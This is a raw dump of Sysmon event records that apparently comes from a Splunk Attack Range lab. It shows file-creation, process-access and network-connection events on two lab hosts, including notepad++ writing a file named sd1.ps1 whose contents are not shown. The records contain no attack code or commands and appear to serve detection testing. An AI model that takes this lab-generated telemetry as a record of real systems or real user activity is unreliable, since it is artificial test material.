Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2A3B6D4857B0918510BF38191E1DA5A6,SHA256=B5D090600915E75BB8AB7AD61AFC7E684004C1A76D8A6339E9A1A483BE71D559,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047053Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:31.347{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=440BC6521921A76AB6E5BFA504FAE61D,SHA256=1F2C17A2B866B9E349DC44BFBDC80CD857CE1CCE387E78EE31D899B366DF0DB9,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001047052Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:47:31.132{466BC892-35E4-60E8-4B0C-00000000CF01}73364916C:\Program Files\Notepad++\notepad++.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6497|C:\Windows\System32\shcore.dll+6387|C:\Windows\System32\shcore.dll+62fd|C:\Windows\System32\shcore.dll+620a|C:\Windows\System32\SHELL32.dll+81da7|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9814|UNKNOWN(FFFFF802784DF8C8)|UNKNOWN(FFFFCC0D472B4A68)|UNKNOWN(FFFFCC0D472AF715)|UNKNOWN(FFFFCC0D472B0C3A)|UNKNOWN(FFFFCC0D472FF1B5)|UNKNOWN(FFFFF802781F6E03)|C:\Windows\System32\win32u.dll+2da4|C:\Windows\system32\DUser.dll+bebd|C:\Windows\system32\DUser.dll+bb02|C:\Windows\System32\USER32.dll+26924|C:\Windows\SYSTEM32\ntdll.dll+a9814|C:\Windows\System32\win32u.dll+10c4 10341000x80000000000000001047051Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:31.132{466BC892-35E4-60E8-4B0C-00000000CF01}73364916C:\Program 
Files\Notepad++\notepad++.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\SHELL32.dll+81c2d|C:\Windows\System32\SHELL32.dll+822d3|C:\Windows\System32\SHELL32.dll+82204|C:\Windows\System32\SHELL32.dll+81ab2|C:\Windows\System32\SHELL32.dll+83770|C:\Windows\System32\SHELL32.dll+8369d|C:\Windows\system32\explorerframe.dll+29e56|C:\Windows\system32\explorerframe.dll+c7e6|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\USER32.dll+148bf|C:\Windows\System32\USER32.dll+2e967|C:\Windows\System32\USER32.dll+2e813|C:\Windows\System32\USER32.dll+2e6b2|C:\Windows\System32\USER32.dll+2e648|C:\Windows\System32\COMDLG32.dll+13ae4|C:\Program Files\Notepad++\notepad++.exe+169a0f|C:\Program Files\Notepad++\notepad++.exe+1675f3|C:\Program Files\Notepad++\notepad++.exe+202e5a|C:\Program Files\Notepad++\notepad++.exe+202686 10341000x80000000000000001047050Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:31.132{466BC892-35E4-60E8-4B0C-00000000CF01}73364916C:\Program 
Files\Notepad++\notepad++.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\SHELL32.dll+81ba9|C:\Windows\System32\SHELL32.dll+822d3|C:\Windows\System32\SHELL32.dll+82204|C:\Windows\System32\SHELL32.dll+81ab2|C:\Windows\System32\SHELL32.dll+83770|C:\Windows\System32\SHELL32.dll+8369d|C:\Windows\system32\explorerframe.dll+29e56|C:\Windows\system32\explorerframe.dll+c7e6|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\USER32.dll+148bf|C:\Windows\System32\USER32.dll+2e967|C:\Windows\System32\USER32.dll+2e813|C:\Windows\System32\USER32.dll+2e6b2|C:\Windows\System32\USER32.dll+2e648|C:\Windows\System32\COMDLG32.dll+13ae4|C:\Program Files\Notepad++\notepad++.exe+169a0f|C:\Program Files\Notepad++\notepad++.exe+1675f3|C:\Program Files\Notepad++\notepad++.exe+202e5a|C:\Program Files\Notepad++\notepad++.exe+202686 10341000x80000000000000001047049Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:31.132{466BC892-35E4-60E8-4B0C-00000000CF01}73364916C:\Program 
Files\Notepad++\notepad++.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6482|C:\Windows\System32\shcore.dll+617d|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\SHELL32.dll+81b8d|C:\Windows\System32\SHELL32.dll+822d3|C:\Windows\System32\SHELL32.dll+82204|C:\Windows\System32\SHELL32.dll+81ab2|C:\Windows\System32\SHELL32.dll+83770|C:\Windows\System32\SHELL32.dll+8369d|C:\Windows\system32\explorerframe.dll+29e56|C:\Windows\system32\explorerframe.dll+c7e6|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\USER32.dll+148bf|C:\Windows\System32\USER32.dll+2e967|C:\Windows\System32\USER32.dll+2e813|C:\Windows\System32\USER32.dll+2e6b2|C:\Windows\System32\USER32.dll+2e648|C:\Windows\System32\COMDLG32.dll+13ae4 10341000x80000000000000001047048Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:31.132{466BC892-35E4-60E8-4B0C-00000000CF01}73364916C:\Program 
Files\Notepad++\notepad++.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6154|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\SHELL32.dll+81b8d|C:\Windows\System32\SHELL32.dll+822d3|C:\Windows\System32\SHELL32.dll+82204|C:\Windows\System32\SHELL32.dll+81ab2|C:\Windows\System32\SHELL32.dll+83770|C:\Windows\System32\SHELL32.dll+8369d|C:\Windows\system32\explorerframe.dll+29e56|C:\Windows\system32\explorerframe.dll+c7e6|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\USER32.dll+148bf|C:\Windows\System32\USER32.dll+2e967|C:\Windows\System32\USER32.dll+2e813|C:\Windows\System32\USER32.dll+2e6b2|C:\Windows\System32\USER32.dll+2e648|C:\Windows\System32\COMDLG32.dll+13ae4|C:\Program Files\Notepad++\notepad++.exe+169a0f 23542300x8000000000000000806737Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:47:32.737{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6C0F977383E93A42DDA789C65A891803,SHA256=4295B59E5BFB024D4F9A1C78FC577BEB54259F9C2EDC756EDDD1AC032F9416EA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047055Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:32.147{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B4B05252222EDD2ED56F111313B1D7AE,SHA256=6641E83CD2B2C31B54DA61215CDD2580E728FFF6F384529AFAEF78E97B017288,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806738Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:47:33.769{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1CABA2C1F879540CAD846F2F12442D33,SHA256=0441B90FBBFBFDF94C82CB17C7CA1872390CBBBA3C68DFCD1A6FD5CF1C2CDEBD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047056Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:33.148{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AB64DFCD6DF2634F014B62AA0EEF09C6,SHA256=DDBC8E5EC2E5C5DE5C6AEBB9602EB2156A47BDCAEA1B430DB08267060B92E82C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806740Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:47:34.830{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0D388D01E42DC38488206848AC03305C,SHA256=6929DCE688B9A333BE17CC9E47FB8B63A63AECC834B71589CC29CF507D8FB394,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047057Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:34.149{466BC892-02CE-60E8-7600-00000000CF01}3400NT 
AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3C7EB30C41A2249C0A9D27FAF609DAB3,SHA256=C49DDB8B028EAE9845431CD9D98DC595DA0691EDC2A1C988EB1076480DAC220B,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000806739Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:47:32.370{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57203-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000806741Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:47:35.830{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8813DBDD6777FFDBECF585EF93ACCAF0,SHA256=1D7DE05A726E3B6E2F04AC34B17930427DDCD24643E0AC529348783CC8F0F54A,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001047059Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:26.553{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local50955-false10.0.1.12-8000- 23542300x80000000000000001047058Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:35.166{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2788A6E89AB00B291DCDF5F9B590438D,SHA256=3D7B1AAAF3B097EEED4E6B4D079FA46B41FD3FFF777B08B7BEB9A66D56C59CCE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806742Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:47:36.862{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2B2420D88963E522D3630381FE0AB3A0,SHA256=25090FB3CF3E349BE1B920FDF70384857F9A84DA299C9B23C24432FD24EA3DCB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047142Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:36.447{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7A35C08A32BA41E055672F01587E5D50,SHA256=7D380619E50BCAC8784C3ED2F506B3B0C6CB4DF9500360839464B1AD172F1A0F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047141Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:36.447{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AAAFDA50ABC01B1302C4DA78A4ED24EE,SHA256=734B2C9F297A630D1E60E453658A71409E0EC8692992744F410CBEF8091F7E35,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047140Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:47:36.248{466BC892-35E4-60E8-4B0C-00000000CF01}7336ATTACKRANGE\bobC:\Program Files\Notepad++\notepad++.exeC:\Users\bob\AppData\Roaming\Notepad++\backup\new 1@2021-07-12_074729MD5=BB87A22CABB0E1CBFD2B4B30711AA20C,SHA256=FA6EE1E8A154941D13A0F4520798BEDC4C573EFE7A1DA8CF9B2F30182DF2332E,IMPHASH=00000000000000000000000000000000falsetrue 11241100x80000000000000001047139Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:36.232{466BC892-35E4-60E8-4B0C-00000000CF01}7336C:\Program Files\Notepad++\notepad++.exeC:\Temp\test\sd1.ps12021-07-12 07:47:36.085 10341000x80000000000000001047138Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:36.201{466BC892-32D3-60E8-770B-00000000CF01}63564632C:\Windows\Explorer.EXE{466BC892-35E4-60E8-4B0C-00000000CF01}7336C:\Program Files\Notepad++\notepad++.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+a6dd7|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9814|UNKNOWN(FFFFF802784DF8C8)|UNKNOWN(FFFFCC0D472B4A68)|UNKNOWN(FFFFCC0D472AF715)|UNKNOWN(FFFFCC0D472B0C3A)|UNKNOWN(FFFFCC0D472AEEF6)|UNKNOWN(FFFFF802781F6E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+5935b|C:\Windows\System32\SHELL32.dll+cf36a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000001047137Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:36.201{466BC892-32D3-60E8-770B-00000000CF01}63564632C:\Windows\Explorer.EXE{466BC892-35E4-60E8-4B0C-00000000CF01}7336C:\Program 
Files\Notepad++\notepad++.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+a6dd7|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9814|UNKNOWN(FFFFF802784DF8C8)|UNKNOWN(FFFFCC0D472B4A68)|UNKNOWN(FFFFCC0D472AF715)|UNKNOWN(FFFFCC0D472B0C3A)|UNKNOWN(FFFFCC0D472AEEF6)|UNKNOWN(FFFFF802781F6E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+5935b|C:\Windows\System32\SHELL32.dll+cf36a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000001047136Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:36.201{466BC892-32D3-60E8-770B-00000000CF01}63564632C:\Windows\Explorer.EXE{466BC892-35E4-60E8-4B0C-00000000CF01}7336C:\Program Files\Notepad++\notepad++.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+a6dd7|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9814|UNKNOWN(FFFFF802784DF8C8)|UNKNOWN(FFFFCC0D472B4A68)|UNKNOWN(FFFFCC0D472AF715)|UNKNOWN(FFFFCC0D472B0C3A)|UNKNOWN(FFFFCC0D472AEEF6)|UNKNOWN(FFFFF802781F6E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+5935b|C:\Windows\System32\SHELL32.dll+cf36a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 
10341000x80000000000000001047135Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:36.201{466BC892-32D3-60E8-770B-00000000CF01}63564632C:\Windows\Explorer.EXE{466BC892-35E4-60E8-4B0C-00000000CF01}7336C:\Program Files\Notepad++\notepad++.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+a6dd7|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9814|UNKNOWN(FFFFF802784DF8C8)|UNKNOWN(FFFFCC0D472B4A68)|UNKNOWN(FFFFCC0D472AF715)|UNKNOWN(FFFFCC0D472B0C3A)|UNKNOWN(FFFFCC0D472AEEF6)|UNKNOWN(FFFFF802781F6E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+5935b|C:\Windows\System32\SHELL32.dll+cf36a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000001047134Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:36.201{466BC892-32D3-60E8-770B-00000000CF01}63564632C:\Windows\Explorer.EXE{466BC892-35E4-60E8-4B0C-00000000CF01}7336C:\Program 
Files\Notepad++\notepad++.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+a6dd7|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9814|UNKNOWN(FFFFF802784DF8C8)|UNKNOWN(FFFFCC0D472B4A68)|UNKNOWN(FFFFCC0D472AF715)|UNKNOWN(FFFFCC0D472B0C3A)|UNKNOWN(FFFFCC0D472AEEF6)|UNKNOWN(FFFFF802781F6E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+5935b|C:\Windows\System32\SHELL32.dll+cf36a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000001047133Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:36.201{466BC892-32D3-60E8-770B-00000000CF01}63564632C:\Windows\Explorer.EXE{466BC892-35E4-60E8-4B0C-00000000CF01}7336C:\Program Files\Notepad++\notepad++.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+a6dd7|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9814|UNKNOWN(FFFFF802784DF8C8)|UNKNOWN(FFFFCC0D472B4A68)|UNKNOWN(FFFFCC0D472AF715)|UNKNOWN(FFFFCC0D472B0C3A)|UNKNOWN(FFFFCC0D472AEEF6)|UNKNOWN(FFFFF802781F6E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+5935b|C:\Windows\System32\SHELL32.dll+cf36a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 
10341000x80000000000000001047132Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:36.201{466BC892-32D3-60E8-770B-00000000CF01}63564632C:\Windows\Explorer.EXE{466BC892-35E4-60E8-4B0C-00000000CF01}7336C:\Program Files\Notepad++\notepad++.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+a6dd7|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9814|UNKNOWN(FFFFF802784DF8C8)|UNKNOWN(FFFFCC0D472B4A68)|UNKNOWN(FFFFCC0D472AF715)|UNKNOWN(FFFFCC0D472B0C3A)|UNKNOWN(FFFFCC0D472AEEF6)|UNKNOWN(FFFFF802781F6E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+5935b|C:\Windows\System32\SHELL32.dll+cf36a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000001047131Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:36.201{466BC892-32D3-60E8-770B-00000000CF01}63564632C:\Windows\Explorer.EXE{466BC892-35E4-60E8-4B0C-00000000CF01}7336C:\Program 
Files\Notepad++\notepad++.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+a6dd7|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9814|UNKNOWN(FFFFF802784DF8C8)|UNKNOWN(FFFFCC0D472B4A68)|UNKNOWN(FFFFCC0D472AF715)|UNKNOWN(FFFFCC0D472B0C3A)|UNKNOWN(FFFFCC0D472AEEF6)|UNKNOWN(FFFFF802781F6E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+5935b|C:\Windows\System32\SHELL32.dll+cf36a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000001047130Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:36.201{466BC892-32D3-60E8-770B-00000000CF01}63564632C:\Windows\Explorer.EXE{466BC892-35E4-60E8-4B0C-00000000CF01}7336C:\Program Files\Notepad++\notepad++.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+a6dd7|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9814|UNKNOWN(FFFFF802784DF8C8)|UNKNOWN(FFFFCC0D472B4A68)|UNKNOWN(FFFFCC0D472AF715)|UNKNOWN(FFFFCC0D472B0C3A)|UNKNOWN(FFFFCC0D472AEEF6)|UNKNOWN(FFFFF802781F6E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+5935b|C:\Windows\System32\SHELL32.dll+cf36a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 
